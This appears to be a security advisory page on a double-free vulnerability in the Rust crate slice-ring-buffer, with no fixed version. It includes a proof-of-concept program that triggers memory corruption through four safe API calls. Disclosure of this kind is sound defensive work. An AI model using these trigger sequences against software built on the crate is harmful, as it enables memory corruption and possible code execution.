Double Free in slice-ring-buffer

Q: How to fix?

There is no fixed version for slice-ring-buffer .

Introduced: 16 Jul 2025

How to fix?

There is no fixed version for slice-ring-buffer.

Overview

slice-ring-buffer is a double-ended queue that Deref's into a slice.

Affected versions of this package are vulnerable to Double Free via the internal handling of safe APIs. An attacker can cause memory corruption or potentially execute arbitrary code by invoking affected safe APIs that trigger double-free conditions due to unsound usage of unsafe code internally.

PoC

use slice_ring_buffer::*;
use std::io;

#[derive(Debug, Clone)]
struct StructA(String);

impl Drop for StructA {
    fn drop(&mut self) {
        println!("Dropping StructA with data at: {:?}", self.0.as_ptr());
    }
}

fn main() {
    println!("Select a bug:");
    println!("1 - DF due to extend_from_slice");
    println!("2 - DF due to shrink_to_fit");
    println!("3 - DF due to insert");
    println!("4 - DF due to into_iter");

    let mut input = String::new();
    io::stdin().read_line(&mut input).expect("Failed to read input");

    match input.trim() {
        "1" => {
            let mut dq1 = SliceRingBuffer::new();
            dq1.push_back(StructA(String::from("AAAA")));
            println!("pushed");
            dq1.pop_back();
            println!("popped");
            let other = &[StructA(String::from("BBBB"))];
            dq1.extend_from_slice(other);
            println!("extended: {:?}", dq1);
        }
        "2" => {
            let mut dq1 = SliceRingBuffer::new();
            dq1.push_back(StructA(String::from("AAAA")));
            dq1.reserve_exact(170);
            dq1.shrink_to_fit();
            println!("After shrink: {:?}", dq1.capacity());
        }
        "3" => {
            let mut vec = vec![
                String::from("0"), String::from("1"), String::from("2"),
                String::from("3"), String::from("4"), String::from("5"),
            ];
            let mut slice_deq = SliceRingBuffer::from(&vec[..]);
            println!("slice_deq_old = {:#?}", slice_deq);
            slice_deq.insert(3, String::from("X"));
            println!("slice_deq_new = {:#?}", slice_deq);
        }
        "4" => {
            let slice_deque = slice_ring_buffer::from_elem(String::from("DF"), 10);
            let iter1 = SliceRingBuffer::into_iter(slice_deque);
            let iter2 = &iter1.clone();
        }
        _ => {
            println!("Invalid option. Please select a number between 1 and 4.");
        }
    }
}

References

CVSS Base Scores

version 4.0

version 3.1

Attack Vector (AV)
Network
Attack Complexity (AC)
Low
Attack Requirements (AT)
None
Privileges Required (PR)
None
User Interaction (UI)
None

Confidentiality (VC)
High
Integrity (VI)
High
Availability (VA)
High

Confidentiality (SC)
None
Integrity (SI)
None
Availability (SA)
None

Double Free Affecting slice-ring-buffer package, versions *

Severity

Do your applications use this vulnerable package?

Snyk Learn

Introduced: 16 Jul 2025

How to fix?

Overview

PoC

References

CVSS Base Scores

Snyk